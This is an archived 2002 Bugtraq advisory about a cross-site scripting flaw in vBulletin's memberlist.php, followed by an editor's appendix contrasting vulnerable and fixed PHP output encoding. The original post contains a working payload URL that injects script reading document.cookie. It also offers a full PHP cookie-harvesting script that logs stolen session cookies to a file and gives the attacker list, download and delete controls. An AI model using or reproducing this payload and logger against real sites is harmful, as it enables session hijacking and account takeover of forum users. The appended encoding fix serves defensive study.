XSS bug in vBulletin

From: Arab VieruZ (arabviersus@hotmail.com)
Date: 11/21/02

    Date: 21 Nov 2002 20:34:03 -0000
    From: Arab VieruZ <arabviersus@hotmail.com>
    To: bugtraq@securityfocus.com

    Vulnerable systems:
     * Jelsoft vBulletin 2.2.9 and prior

    Exploit:

    http://www.vbulletin.com/forum/memberlist.php?
    s=23c37cf1af5d2ad05f49361b0407ad9e&what=">"<Scr*ipt>javascript:alert
    (document.cookie)</Scr*ipt>

    you can use this code (thanx for SP.IC):

    <?PHP
          // vBulletin XSS Injection Vulnerability: Exploit
          // ---
          // Coded By : Sp.IC (SpeedICNet@Hotmail.Com).
          // Description: Fetching vBulletin's cookies and storing them into a log file.

          // Variables:

          $LogFile = "Cookies.Log";

          // Functions:
          /*
          If ($HTTP_GET_VARS['Action'] = "Log") {
              $Header = "<!--";
              $Footer = "--->";
          }
          Else {

               $Header = "";
               $Footer = "";
          }
          Print ($Header);
          */
          Print ("<Title>vBulletin XSS Injection Vulnerability:
    Exploit</Title>");
          Print ("<Pre>");
          Print ("<Center>");
          Print ("<B>vBulletin XSS Injection Vulnerability: Exploit</B>\n");
          Print ("Coded By: <B><A
    Href=\"MailTo:SpeedICNet@Hotmail.Com\">Sp.IC</A></B><Hr Width=\"20%\">");
          /*
          Print ($Footer);
          */

          Switch ($HTTP_GET_VARS['Action']) {
              Case "Log":

                     $Data = $HTTP_GET_VARS['Cookie'];
                     $Data = StrStr ($Data, SubStr ($Data, BCAdd (0x0D, StrLen
    (DecHex (MD5 (NULL))))));
                     $Log = FOpen ($LogFile, "a+");
                             FWrite ($Log, Trim ($Data) . "\n");
                             FClose ($Log);
                             Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"0;
    URL=" . $HTTP_SERVER_VARS['HTTP_REFERER'] . "\">");
              Break;
                    Case "List":
                     If (!File_Exists ($LogFile) || !In_Array ($Records)) {
                         Print ("<Br><Br><B>There are No
    Records</B></Center></Pre>");
                         Exit ();
                     }
                     Else {
                         Print ("</Center></Pre>");
                         $Records = Array_UniQue (File ($LogFile));
                                      Print ("<Pre>");
                                      Print ("<B>.:: Statics</B>\n");
                         Print ("\n");
                                      Print ("o Logged Records : <B>" . Count
    (File ($LogFile)) . "</B>\n");
                         Print ("o Listed Records : <B>" . Count
    ($Records) . " </B>[Not Counting Duplicates]\n");
                         Print ("\n");
                 
                         Print ("<B>.:: Options</B>\n");
                         Print ("\n");
                 
                         If (Count (File ($LogFile)) > 0) {
                             $Link['Download'] = "[<A Href=\"" .
    $LogFile . "\">Download</A>]";
                         }
                         Else{
                             $Link['Download'] = "[No Records in Log]";
                         }

                         Print ("o Download Log : " . $Link
    ['Download'] . "\n");
                         Print ("o Clear Records : [<A Href=\"" .
    $SCRIPT_PATH. "?Action=Delete\">Y</A>]\n");
                         Print ("\n");
                         Print ("<B>.:: Records</B>\n");
                         Print ("\n");

                         While (List ($Line[0], $Line[1]) = Each ($Records)) {
                             Print ("<B>" . $Line[0] . ": </B>" . $Line[1]);
                         }
                     }

                     Print ("</Pre>");
              Break;
              Case "Delete":
                  @UnLink ($LogFile);
                  Print ("<Br><Br><B>Deleted Succsesfuly</B></Center></Pre>")
    Or Die ("<Br><Br><B>Error: Cannot Delete Log</B></Center></Pre>");
                  Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"3; URL=" .
    $HTTP_SERVER_VARS['HTTP_REFERER'] . "\">");
              Break;
          }
        ?>

    -----------------
    Arab VieruZ
    thanX
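Added for context and not part of the original post: a minimal PHP illustration of the bug class the advisory reports (a request parameter reflected into an HTML attribute without encoding) next to the fix. The two rendering functions are hypothetical stand-ins for vBulletin's own memberlist.php template code, which the post does not show.

```php
<?php
// Illustration added by the editor, not code from the original post or from
// vBulletin. The "what" search term is echoed back into an attribute value.

// Vulnerable pattern: raw reflection. A value starting with "> closes the
// attribute and the tag, so any markup that follows is rendered as HTML.
function render_search_box_vulnerable(string $what): string
{
    return '<input type="text" name="what" value="' . $what . '">';
}

// Hardened pattern: encode for the HTML attribute context. ENT_QUOTES also
// covers single-quoted attributes; ENT_SUBSTITUTE avoids returning an empty
// string on invalid UTF-8, which would otherwise hide the problem.
function render_search_box_fixed(string $what): string
{
    $safe = htmlspecialchars($what, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="what" value="' . $safe . '">';
}

// Self-check using the payload shape quoted in the advisory (constructed here).
function self_check(): bool
{
    $payload = '"><script>alert(document.cookie)</script>';

    $bad  = render_search_box_vulnerable($payload);
    $good = render_search_box_fixed($payload);

    $expectedGood = '<input type="text" name="what" value="'
        . '&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;">';

    // The raw version breaks out of the attribute; the encoded one does not.
    return str_contains($bad, '"><script>')
        && !str_contains($good, '<script>')
        && $good === $expectedGood;
}

echo self_check() ? "encoding neutralises the payload\n" : "check failed\n";
```

The same attribute-context encoding applies to every reflected parameter on the page, not only the one the post names.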
